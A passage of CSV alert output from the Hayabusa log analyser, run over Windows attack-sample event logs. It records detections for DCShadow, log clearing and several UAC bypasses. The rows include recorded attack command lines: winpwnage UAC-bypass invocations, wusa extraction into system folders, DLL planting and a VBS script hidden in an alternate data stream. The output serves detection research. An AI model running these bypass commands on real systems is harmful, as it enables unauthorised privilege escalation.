Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx 2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx 2019-05-08 12:00:37.572 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx 2019-05-08 12:00:37.586 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx 2019-05-09 10:59:28.669 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:28.684 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3752 | PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:28.684 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\eventvwr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3752 | Tgt PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:28.950 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x1394a | PID: 3884 | PGUID: 365ABB72-8980-5CD3-0000-00105F451F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:29.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0x1394a | PID: 3840 | PGUID: 365ABB72-8980-5CD3-0000-0010134D1F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,Evas | PrivEsc,UAC Bypass via Event Viewer,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 11:00:01.794 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-89A1-5CD3-0000-001013732100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx 2019-05-09 11:07:51.131 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" /kickoffelev | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3836 | PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx 2019-05-09 11:07:51.131 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx 2019-05-09 11:07:56.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx 2019-05-09 11:08:00.446 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ? | LID: 0x1394a | PID: 2264 | PGUID: 365ABB72-8B80-5CD3-0000-001065512A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx 2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx 2019-05-09 11:52:18.765 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1900 | PGUID: 365ABB72-9570-5CD3-0000-00103FC90A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:18.844 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 1292 | PGUID: 365ABB72-95E2-5CD3-0000-001097410F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:18.922 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3636 | PGUID: 365ABB72-95E2-5CD3-0000-0010C6440F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:18.953 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3620 | PGUID: 365ABB72-95E2-5CD3-0000-001083470F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:18.969 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2420 | PGUID: 365ABB72-95E2-5CD3-0000-001074490F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:19.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 3536 | PGUID: 365ABB72-95E3-5CD3-0000-00100C650F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:21.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3828 | PGUID: 365ABB72-95E5-5CD3-0000-00101F720F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:21.265 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3824 | PGUID: 365ABB72-95E5-5CD3-0000-00108F720F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:21.281 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2852 | PGUID: 365ABB72-95E5-5CD3-0000-001065730F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:21.297 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2364 | PGUID: 365ABB72-95E5-5CD3-0000-001033750F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:21.594 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 2800 | PGUID: 365ABB72-95E5-5CD3-0000-0010E1890F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.500 +09:00,IEWIN7,15,info,,Alternate Data Stream Created,Path: C:\Users\IEUser\AppData | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00 | Hash: Unknown,../hayabusa-rules/hayabusa/sysmon/events/15_AlternateDataStreamCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.500 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData:tghjx5xz2ky.vbs | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 11:52:23.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3784 | PGUID: 365ABB72-95E7-5CD3-0000-001004970F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx 2019-05-09 12:25:24.896 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3184 | PGUID: 365ABB72-9DA4-5CD3-0000-00102E692F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx 2019-05-09 12:25:25.067 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x13add | PID: 2920 | PGUID: 365ABB72-9DA4-5CD3-0000-00107F7A2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx 2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx 2019-05-10 21:21:57.077 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a4f | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx 2019-05-10 21:22:02.434 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | Process: c:\python27\python.exe | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx 2019-05-10 21:22:08.465 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" | Process: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\perfmon.exe"" | LID: 0x13a11 | PID: 1644 | PGUID: 365ABB72-6CF0-5CD5-0000-0010140F1C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx 2019-05-10 21:22:08.465 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx 2019-05-10 22:32:48.200 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 2796 | PGUID: 365ABB72-7D80-5CD5-0000-00100AD01300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:32:48.412 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:32:58.549 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\CompMgmtLauncher.exe"" | LID: 0x141f8 | PID: 2076 | PGUID: 365ABB72-7D86-5CD5-0000-0010CC2E1400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:33:29.424 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /priv | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""c:\Windows\System32\cmd.exe"" | LID: 0x141f8 | PID: 2524 | PGUID: 365ABB72-7DA9-5CD5-0000-00100ED31400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami Showing Privileges,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx 2019-05-10 22:49:29.586 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:29.789 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\NTWDBLIB.dll | Process: c:\python27\python.exe | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:29.789 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:34.946 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 1700 | PGUID: 365ABB72-816E-5CD5-0000-0010FEB62300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:39.930 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 3608 | PGUID: 365ABB72-8173-5CD5-0000-00102FCD2300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:40.164 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 2676 | PGUID: 365ABB72-8174-5CD5-0000-0010ABE62300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:45.133 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 1052 | PGUID: 365ABB72-8179-5CD5-0000-00102CFF2300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-10 22:49:45.378 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 880 | PGUID: 365ABB72-8179-5CD5-0000-001083182400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx 2019-05-11 18:50:08.248 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x136c5 | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:08.491 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:08.491 +09:00,IEWIN7,11,medium,,Rename Common File to DLL 